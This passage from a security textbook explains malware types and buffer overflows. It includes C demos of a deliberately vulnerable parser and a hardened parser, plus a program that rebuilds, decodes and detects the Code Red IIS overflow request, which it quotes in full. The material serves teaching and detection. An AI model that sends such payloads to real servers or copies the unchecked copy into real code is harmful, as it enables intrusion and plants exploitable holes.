Because few good technological solutions exist to counter human security problems, we won’t focus here on the human side of this equation—even though, as noted, human vulnerabilities top the list of security vulnerabilities. Instead, we’ll cover some of the common programmatic types of attacks you’ll encounter that you can avoid by using technological solutions.
A virus is a program that “infects” the computer in some way, sometimes maliciously, by inserting itself into other, legitimate host files on your system. Two important characteristics of viruses are
Viruses must somehow execute themselves on the target machine through a host file.
Viruses must somehow replicate themselves.
A computer virus acts much like a biological virus, in that it attacks and weakens otherwise healthy parts of a system. Computer viruses frequently take over a machine by inserting themselves into, or replacing, a valid program on that machine, and then use that machine to help commandeer other machines.
A Trojan horse is a hidden functionality that is built into a seemingly harmless program and can compromise a system. A typical example of a Trojan horse is a joke program that is passed around via e-mail. When the joke is accessed by an unsuspecting user, some “special” code is downloaded on that user’s system. Once loaded onto a system, it can launch other malicious code.
A worm is similar to a virus, except that a worm does not require a host file to run on the machine. It can spread without piggybacking on another file. A worm takes over a machine by propagating itself to such an extent that it competes with, and eventually starves, the other applications running on your system, which can bring the system down. Worms creep into other systems as well, by replicating themselves across the network to other machines. At the time of writing, worms are the most common type of attack.
Worms can attack a system in several ways, but the most common attack in the Microsoft world is the buffer overflow. Slammer and Code Red both got in this way. Nimda, often listed alongside them, spread mostly through other means: e-mail, open network shares, an IIS directory traversal flaw, and the backdoors that Code Red II had left behind.
A buffer is a temporary storage area that a program uses to hold data while it waits to be transferred between two locations, such as between an application’s data area and a device, or while it waits to be processed. Buffers are everywhere in programs. Because the programmer decides in advance how much data a given field will hold, a buffer has a fixed size. A buffer overflow occurs when a program or process tries to store more data in a buffer than the buffer was sized to hold; in a language that does not check bounds, the excess is written past the end of the buffer into whatever sits next to it in memory.
Here’s an oversimplified example of a buffer overflow. Say two applications are talking, and the first thing they are supposed to say to one another is “Hello.” As a programmer, you would probably size the buffer to five characters, enough to hold Hello. If someone’s program sends “Hey, what’s up?” instead, that program is obviously not conforming to the standard.
If attackers weren’t around, this wouldn’t be an issue: your program simply wouldn’t work well with the other program, so the other programmer would have no reason not to follow your standard. An attacker, however, doesn’t want the program to work with your system; breaking it is the whole point.
In this example, the first thing the programming standard says is that communication begins with Hello. Next, the data that follows tells the program what to do—in this case, let’s say that the data is supposed to be 18 characters. A normal bit of data, then, might look like this:
HELLO OPEN_MY_FILE_&EDIT
In this case, your program checks the data and follows the instructions.
Now we’ll create a buffer overflow by intentionally making the data longer than it should be:
HELLOGRANT_ADMIN_RIGHTS OPEN_MY_FILE_&EDIT
Because the first field is longer than the five characters the buffer holds, the excess has to go somewhere. With no bounds check it overwrites the adjacent memory, in this case the second buffer, so the data section now reads as an instruction to grant administrative rights. From there, the worm can load its malicious code on the system.
This type of attack is prevalent because C and C++ do not check array bounds for you: unless the programmer explicitly compares every input length against the size of the buffer that receives it, the application has no way to cope with an oversized or malformed packet. Lax programming practice turns that property of the language into a hole.
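The following is an added example, not code from the original text, that turns the Hello exchange above into a few lines of C. The message layout, the field names and both parsers are assumptions made for the demo: the greeting field is exactly five bytes, and the command field sits right after it in memory, so the unchecked copy in the vulnerable parser spills the extra characters straight into the command, as the text describes. The hardened parser beside it checks every length against the field that receives it and rejects the oversized message.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not from the original text): the "HELLO <command>" protocol
 * from the page modelled as a fixed-layout message. Field names and sizes are
 * assumptions for this demo. Both members are char arrays, so there is no
 * padding and command follows greeting directly in memory. */
struct message {
    char greeting[5];   /* fixed-width field, exactly "HELLO", no terminator */
    char command[19];   /* up to 18 characters plus NUL */
};

/* Vulnerable parser. The command field is filled with a bounded copy, but the
 * greeting is copied byte for byte without comparing its length against the
 * five bytes the field holds, so a long greeting overwrites whatever follows
 * it: here, the command the program will act on. The only cap is at the end of
 * the struct, purely so the demo stays deterministic; a real program has no
 * such fence and keeps writing into whatever memory comes next. */
static int parse_vulnerable(struct message *m, const char *in)
{
    const char *sp = strchr(in, ' ');
    if (sp == NULL)
        return -1;

    memset(m->command, 0, sizeof m->command);
    strncpy(m->command, sp + 1, sizeof m->command - 1);

    size_t glen = (size_t)(sp - in);
    if (glen > sizeof *m)                 /* demo fence, see comment above */
        glen = sizeof *m;
    unsigned char *raw = (unsigned char *)m;
    for (size_t i = 0; i < glen; i++)     /* BUG: never checked against sizeof m->greeting */
        raw[i] = (unsigned char)in[i];
    return 0;
}

/* Hardened parser: every length is checked against the field that receives it
 * before a single byte is copied, and anything that does not match the
 * protocol is rejected rather than "handled". */
static int parse_hardened(struct message *m, const char *in)
{
    const char *sp = strchr(in, ' ');
    if (sp == NULL)
        return -1;
    size_t glen = (size_t)(sp - in);
    size_t clen = strlen(sp + 1);
    if (glen != sizeof m->greeting)       /* the protocol says exactly five characters */
        return -1;
    if (clen >= sizeof m->command)        /* leave room for the terminator */
        return -1;
    memcpy(m->greeting, in, glen);
    memcpy(m->command, sp + 1, clen + 1);
    return 0;
}

/* Run one message through a parser and return the command the program would
 * go on to execute, or NULL if the parser rejected the message. */
static const char *command_after(int (*parse)(struct message *, const char *),
                                 const char *in)
{
    static struct message m;
    memset(&m, 0, sizeof m);
    if (parse(&m, in) != 0)
        return NULL;
    return m.command;
}

/* The two messages from the page: a conforming one and the oversized one. */
static const char NORMAL_MSG[]   = "HELLO OPEN_MY_FILE_&EDIT";
static const char OVERFLOW_MSG[] = "HELLOGRANT_ADMIN_RIGHTS OPEN_MY_FILE_&EDIT";

int main(void)
{
    const char *c;
    c = command_after(parse_vulnerable, NORMAL_MSG);
    printf("vulnerable, normal   : %s\n", c ? c : "(rejected)");
    c = command_after(parse_vulnerable, OVERFLOW_MSG);
    printf("vulnerable, overflow : %s\n", c ? c : "(rejected)");   /* GRANT_ADMIN_RIGHTS */
    c = command_after(parse_hardened, NORMAL_MSG);
    printf("hardened, normal     : %s\n", c ? c : "(rejected)");
    c = command_after(parse_hardened, OVERFLOW_MSG);
    printf("hardened, overflow   : %s\n", c ? c : "(rejected)");
    return 0;
}
```

Compile with cc -Wall and run it: the vulnerable parser reports GRANT_ADMIN_RIGHTS as the command for the oversized message, while the hardened one rejects that message outright. What gets overwritten in a real server is whatever happens to follow the buffer, which is why the same bug can also hand an attacker control of a return address.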
Code Red is a textbook example of a worm using this tactic. Here is the request containing the buffer overflow that Code Red sends to IIS servers running the Indexing Service ISAPI extension (the handler for .ida requests):
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
Note the request to /default.ida: a long run of N characters to overflow the buffer, followed by the payload written as %u escapes, each of which IIS decodes into a 16-bit value.

Before you can understand how to fix security problems, you need to be familiar with a few terms. Microsoft has established definitions for service packs, hotfixes, and security patches.
Service Packs Service packs are a collection of software updates bundled together for easy installation. They can correct problems in the code, provide product enhancements, and include driver updates. They can also add functionality to software, and they are typically regression tested. Service packs are cumulative, so each successive service pack contains all the fixes included in the previous ones. This is handy, because it means you have to install only the most recent service pack to get all the updates.
Hotfixes Hotfixes are patches for specific products that provide specific updates. They do not go through regression testing before release, and they are not intended for general installation. Thus, you should install a hotfix only if you experience the specific critical issue that the hotfix is designed to resolve. Typically, hotfixes are created and released only when a critical issue exists and no acceptable workaround is available.
Security Patches A security patch is basically a hotfix that fixes a specific security vulnerability, so the same caution applies to it as to any other hotfix. However, because a security patch usually closes a vulnerability an attacker can exploit, it deserves more weight than an ordinary hotfix: weigh the risk of an untested fix against the exposure of leaving the vulnerability open.
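As a second added example, again not code from the original text, the following C program rebuilds the Code Red request quoted above and takes it apart. It assumes the commonly cited filler length of 224 N characters and a detection threshold of 200, both choices made for the demo; the escapes are the ones on the page. IIS decodes each %uXXXX as a 16-bit value, and the value sits in memory low byte first, so %u9090 becomes two 0x90 bytes (the x86 NOP) and the pair %ucbd3%u7801 becomes the 32-bit value 0x7801cbd3, the fixed address the worm steers execution to once the buffer has been overrun.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example (not from the original text): rebuild the Code Red request
 * and decode it. FILLER_LEN and the threshold in looks_like_code_red() are
 * assumptions for this demo. */

/* The escapes exactly as quoted on the page, including the truncated "%u00=a". */
static const char CODE_RED_TAIL[] =
    "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
    "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a";

#define FILLER_LEN 224   /* commonly cited length of the worm's run of N */

/* Build "/default.ida?" + FILLER_LEN x 'N' + the escape tail in a static buffer. */
static const char *code_red_request(void)
{
    static char req[16 + FILLER_LEN + sizeof CODE_RED_TAIL];
    size_t n = 13;
    memcpy(req, "/default.ida?", n);
    memset(req + n, 'N', FILLER_LEN);
    n += FILLER_LEN;
    memcpy(req + n, CODE_RED_TAIL, sizeof CODE_RED_TAIL);  /* copies the NUL too */
    return req;
}

/* Number of `fill` bytes immediately after the '?' in the request. */
static size_t count_filler(const char *req, char fill)
{
    const char *q = strchr(req, '?');
    size_t n = 0;
    if (q == NULL)
        return 0;
    for (q++; *q == fill; q++)
        n++;
    return n;
}

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode every %uXXXX escape in `s` into the two bytes the 16-bit value
 * occupies in memory (low byte first). Decoding stops at the first escape
 * that is not followed by four hex digits, which is how the page's request
 * ends. Returns the number of bytes written. */
static size_t decode_percent_u(const char *s, unsigned char *out, size_t cap)
{
    size_t n = 0;
    for (const char *p = strstr(s, "%u"); p != NULL; p = strstr(p + 2, "%u")) {
        unsigned v = 0;
        int i;
        for (i = 0; i < 4; i++) {
            int h = hexval((unsigned char)p[2 + i]);   /* stops safely at NUL */
            if (h < 0)
                break;
            v = v * 16 + (unsigned)h;
        }
        if (i < 4 || n + 2 > cap)
            break;
        out[n++] = (unsigned char)(v & 0xff);   /* %u9090 -> 0x90 0x90: two NOPs */
        out[n++] = (unsigned char)(v >> 8);
    }
    return n;
}

/* Read four decoded bytes as the little-endian 32-bit value they form. */
static uint32_t le32(const unsigned char *b)
{
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8) |
           ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

/* Crude signature of the kind a web-log filter might use: the .ida path, a
 * long run of filler, and %u escapes in the query string. */
static int looks_like_code_red(const char *req)
{
    return strncmp(req, "/default.ida?", 13) == 0
        && count_filler(req, 'N') >= 200
        && strstr(req, "%u") != NULL;
}

int main(void)
{
    const char *req = code_red_request();
    unsigned char bytes[64];
    size_t n = decode_percent_u(req, bytes, sizeof bytes);

    printf("filler bytes : %zu\n", count_filler(req, 'N'));
    printf("decoded %zu bytes:", n);
    for (size_t i = 0; i < n; i++)
        printf(" %02x", bytes[i]);
    printf("\nword at +4   : 0x%08x\n", le32(bytes + 4));
    printf("matches      : %d\n", looks_like_code_red(req));
    return 0;
}
```

The decoder is deliberately strict: a malformed escape ends decoding rather than being skipped, so the 44 bytes it returns for this request are exactly the 22 well-formed words before the truncated tail. For real log analysis you would match on the decoded bytes as well as on the raw string, since the same payload can be spelled in more than one encoding.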